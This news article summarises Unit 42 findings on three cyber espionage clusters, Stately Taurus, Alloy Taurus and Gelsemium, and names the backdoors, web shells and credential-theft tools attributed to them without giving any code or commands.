In a recent blog post, cybersecurity company Unit 42 has identified multiple cyber espionage groups involved in various hacking activities. One of the groups, named Stately Taurus, is believed to be linked to China.
With a moderate-high level of confidence, Unit 42 has concluded that the activities conducted by Stately Taurus are associated with Chinese cyber espionage. The attribution is supported by the use of unique and rare tools like the ToneShell backdoor, which have not been publicly documented in connection with any other known threat actor. This revelation sheds light on the increasing sophistication and capabilities of Chinese hackers in their pursuit of intellectual property theft.
Another cluster of hacking incidents has been attributed, with a moderate level of confidence, to a group called Alloy Taurus. These incidents involved the deployment of numerous web shells by exploiting vulnerabilities in Exchange Servers. Web shells are a type of malicious script that provide remote access to compromised servers, allowing hackers to control them remotely. This tactic highlights the continued relevance of old techniques like web shell attacks.
The cyber espionage activities conducted by these groups involved extensive reconnaissance on the targeted networks. To gather information, the hackers utilized a range of tools, including Chinese open-source scanning framework LadonGo, IP scanner NBTScan, command-line tool ADFind, and Impacket. Additionally, they employed credential harvesting tools such as Hdump, MimiKatz, and DCSync to steal login information.
Once the initial infiltration was successful, the state-sponsored actors aimed to maintain a foothold in the compromised networks and establish persistence. They achieved this by installing various tools and malware. Notably, they used Cobalt Strike, a well-known penetration testing beacon, and Quasar remote access Trojan (RAT) malware. These tools allowed them to remotely access and control the compromised systems. Furthermore, they utilized SSH tunneling through command-line action tools like PuTTY Link and HTran to conceal their activities.
In a separate discovery, Unit 42 identified a cluster of attacks attributed to a group known as Gelsemium. Unlike the previous two groups, Gelsemium is not linked to any specific state. However, their tactics and tools stand out due to their rarity and uniqueness. Unit 42 concluded with a moderate level of confidence that Gelsemium was responsible for a series of attacks on sensitive servers belonging to a government entity in Southeast Asia. The cluster featured a combination of rare malware, including the SessionManager IIS backdoor and OwlProxy, enabling the threat actor to gain unauthorized access and collect sensitive information.
These findings by Unit 42 highlight the evolving nature of cyber threats and the increasing complexity of cyber espionage campaigns. The attribution of these activities to specific groups, particularly those with state affiliations like Stately Taurus, underscores the need for robust cybersecurity measures to protect against intellectual property theft and other malicious activities. As cybercriminals continue to advance their techniques and exploit vulnerabilities, it is vital for organizations and governments to remain vigilant and proactive in their defense against cyber threats.